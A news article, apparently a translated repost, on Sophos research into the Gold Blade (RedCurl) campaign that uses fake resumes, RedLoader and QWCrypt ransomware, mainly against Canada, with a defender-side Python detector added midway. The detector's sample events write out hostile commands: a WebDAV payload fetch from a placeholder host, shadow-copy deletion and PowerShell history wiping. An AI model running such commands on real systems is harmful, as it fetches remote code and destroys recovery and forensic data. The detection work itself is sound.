Gold Blade deploys QWCrypt ransomware; 80% of STAC6565 attacks target Canada

By user, December 9, 2025

Canadian organizations have emerged as the main target of a targeted cyber campaign attributed to the threat activity cluster known as STAC6565.

Cybersecurity company Sophos announced that it investigated approximately 40 intrusions linked to this actor between February 2024 and August 2025. The cluster is assessed with high confidence to overlap with the hacking group known as Gold Blade, also tracked as Earth Kapre, RedCurl, and Red Wolf.

The financially motivated attacker is believed to have been active since late 2018, initially targeting organizations in Russia, but has since expanded to include organizations in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the United Kingdom, and the United States. The group has a history of using phishing emails to conduct commercial espionage.

However, a recent wave of attacks revealed that RedCurl was conducting ransomware attacks using a custom-built malware strain called QWCrypt. One notable tool in the threat actor’s arsenal is RedLoader. RedLoader sends information about the infected host to a command-and-control (C2) server and runs a PowerShell script to gather details about the compromised Active Directory (AD) environment.

“This attack reflects the group’s unusually narrow geographic focus, with almost 80% of attacks targeting organizations in Canada,” said Sophos researcher Morgan Demboski. “Once primarily focused on cyber espionage, Gold Blade has evolved its operations into a hybrid operation that blends data theft with selective ransomware deployment through a custom locker named QWCrypt.”

Other notable targets include the United States, Australia, and the United Kingdom, with the services, manufacturing, retail, technology, non-governmental organizations, and transportation sectors hardest hit during this period.


The group is said to operate under a “hack-for-hire” model, performing customized intrusions on behalf of clients and deploying ransomware on the side to monetize those intrusions. Group-IB’s 2020 report assessed that the group may be Russian-speaking, but there is currently no evidence to confirm or refute this.

Sophos described RedCurl as a “specialized operation” and said the threat actor’s ability to refine and evolve its methods, together with its ability to launch low-profile extortion attacks, sets it apart from other cybercrime groups. There is, however, no evidence to suggest that it is state-sponsored or politically motivated.

The cybersecurity firm also noted that the tempo of activity is marked by periods of inactivity followed by sudden spikes in attacks using improved tactics, indicating that the group may be using the downtime to update its toolset.

STAC6565 attacks begin with a spear-phishing email targeting human resources (HR) personnel, tricking them into opening a malicious document disguised as a resume or cover letter. Since at least November 2024, the operation has used legitimate job search platforms such as Indeed, JazzHR, and ADP WorkforceNow to upload weaponized resumes as part of the job application process.

“Recruiting platforms allow HR professionals to see every resume they receive, so hosting the payload on these platforms and delivering it via a single-use email domain not only increases the likelihood that the document will be opened, but also avoids detection by email-based protections,” Demboski explained.

In one incident, a fake resume uploaded to Indeed was found to redirect users to a booby-trapped URL, ultimately leading to the deployment of QWCrypt ransomware via the RedLoader chain. At least three different RedLoader delivery sequences have been observed, in September 2024, March/April 2025, and July 2025. Some aspects of the distribution chain were previously detailed by Huntress, eSentire, and Bitdefender.

A major change observed in July 2025 concerns the use of ZIP archives dropped by the fake resumes. Inside the archive is a Windows shortcut (LNK) disguised as a PDF. The LNK file uses “rundll32.exe” to retrieve a renamed copy of “ADNotificationManager.exe” from a WebDAV server hosted behind a Cloudflare Workers domain.

The attack then launches this legitimate Adobe executable to sideload a RedLoader DLL (named “srvcli.dll” or “netutils.dll”) from the same WebDAV path. The DLL connects to an external server and downloads and executes a second-stage payload. This payload is a standalone binary responsible for connecting to another server and retrieving a third-stage standalone executable along with a malicious DAT file and a renamed copy of 7-Zip.

Both stages rely on Microsoft’s Program Compatibility Assistant (“pcalua.exe”) to execute the payload, an approach observed in previous campaigns. The only difference is that in April 2025 the payload format changed from a DLL to an EXE.

“The payload parses the malicious .dat file and checks internet connectivity. It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system detection,” Sophos said. “The script unzips Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products.”

The execution results are packaged into an encrypted, password-protected 7-Zip archive and transferred to an attacker-controlled WebDAV server. RedCurl has also been observed using open source reverse proxies RPivot and Chisel SOCKS5 for C2 communications.

Another tool used in the attacks is a customized version of the Terminator tool, which leverages the signed Zemana AntiMalware driver to kill antivirus-related processes, a technique known as Bring Your Own Vulnerable Driver (BYOVD). In at least one case in April 2025, the attacker renamed both components before distributing them to all servers in the victim environment via an SMB share.

Sophos also noted that the majority of these attacks were detected and mitigated before QWCrypt was installed. However, in three of the attacks (one in April 2025 and two in July 2025) the ransomware was successfully deployed.

“In the April incident, the attackers manually viewed and collected sensitive files and remained inactive for over five days before deploying the lockers,” the report added. “This delay may suggest that the attackers have resorted to ransomware after attempting to monetize the data or failing to secure a buyer.”


QWCrypt deployment scripts are tailored to the target environment and often include a victim-specific ID in the file name. When the script is launched, it checks to see if the Terminator service is running before taking steps to disable recovery and execute ransomware on endpoint devices on the network, including the organization’s hypervisor.

In the final stage, the script runs a cleanup batch script that removes existing shadow copies and all PowerShell console history files to hinder forensic recovery.
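As an added defender-side example (not Sophos’ code or anything from the report), the following Python flags the observable behaviours from the delivery chain described above (rundll32.exe loading from a WebDAV UNC path, pcalua.exe used as a proxy launcher) and from the cleanup stage (shadow copy deletion, PowerShell console history removal), run over constructed sample process-creation events. The simplified event schema, hostnames and file names are assumptions, not indicators from the article.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """Simplified Sysmon-style process-creation record (constructed schema)."""
    image: str         # full path of the created process
    command_line: str  # full command line

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# UNC path to a WebDAV host, e.g. \\host.example@SSL\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(@ssl)?(@\d+)?\\", re.I)

RULES = [
    # LNK stage: rundll32.exe pulling a payload from a remote WebDAV share
    ("rundll32_webdav_load", lambda e: _basename(e.image) == "rundll32.exe"
        and WEBDAV_UNC.search(e.command_line) is not None),
    # Program Compatibility Assistant used as a proxy launcher for a staged payload
    ("pcalua_proxy_exec", lambda e: _basename(e.image) == "pcalua.exe"
        and re.search(r"\s-a\s+\S", e.command_line, re.I) is not None),
    # Cleanup stage: volume shadow copies deleted to block recovery
    ("shadow_copy_deletion", lambda e: _basename(e.image) in ("vssadmin.exe", "wmic.exe")
        and re.search(r"delete\s+shadows|shadowcopy\s+delete", e.command_line, re.I) is not None),
    # Cleanup stage: PowerShell console history removed to hinder forensics
    ("ps_history_wipe", lambda e: "consolehost_history.txt" in e.command_line.lower()
        and re.search(r"\b(del|erase|remove-item|rm)\b", e.command_line, re.I) is not None),
]

def evaluate(events):
    """Return (rule_name, command_line) for each event that matches a rule."""
    return [(name, e.command_line) for e in events for name, pred in RULES if pred(e)]

SYS32 = "C:\\Windows\\System32\\"
# Constructed sample telemetry: hostnames and file names are placeholders, not IoCs.
SAMPLE_EVENTS = [
    ProcessEvent(SYS32 + "rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),          # benign
    ProcessEvent(SYS32 + "rundll32.exe", r"rundll32.exe \\webdav.example.invalid@SSL\DavWWWRoot\cv\notify.exe"),
    ProcessEvent(SYS32 + "pcalua.exe", r"pcalua.exe -a C:\Users\Public\stage2.exe"),
    ProcessEvent(SYS32 + "vssadmin.exe", "vssadmin.exe list shadows"),                         # benign
    ProcessEvent(SYS32 + "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ProcessEvent(SYS32 + "cmd.exe",
                 r'cmd.exe /c del /f /q "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"'),
]

if __name__ == "__main__":
    for name, cmd in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The two benign events fall through all rules, so the only hits are the four staged behaviours, in chain order.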

“Gold Blade’s exploitation of its adoption platform, cycles of dormancy and bursting, and continued refinement of its delivery method demonstrate a level of operational maturity not typically associated with financially motivated attackers,” Sophos said. “The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tools and custom binaries to facilitate a multi-step malware delivery chain.”

The disclosure comes as Huntress said it has noticed a significant spike in ransomware attacks against hypervisors, driven largely by the Akira group, rising from 3% of cases in the first half of this year to 25% so far in the second half.

“Ransomware operators deploy ransomware payloads directly through the hypervisor, completely bypassing traditional endpoint protections,” wrote researchers Anna Pham, Ben Bernstein, and Dray Agha. “In some cases, attackers utilize built-in tools such as OpenSSL to perform virtual machine volume encryption, bypassing the need to upload custom ransomware binaries.”

“This shift highlights a growing and disturbing trend: Attackers are targeting the infrastructure that controls all hosts, and access to the hypervisor allows adversaries to dramatically amplify the impact of their intrusions.”

Given threat actors’ focus on the hypervisor, recommended mitigations include using local ESXi accounts, enforcing multi-factor authentication (MFA), implementing strong password policies, separating hypervisor management networks from production and user networks, deploying jump boxes to audit administrator access, restricting access to the control plane, and restricting access to ESXi management interfaces to specific management devices.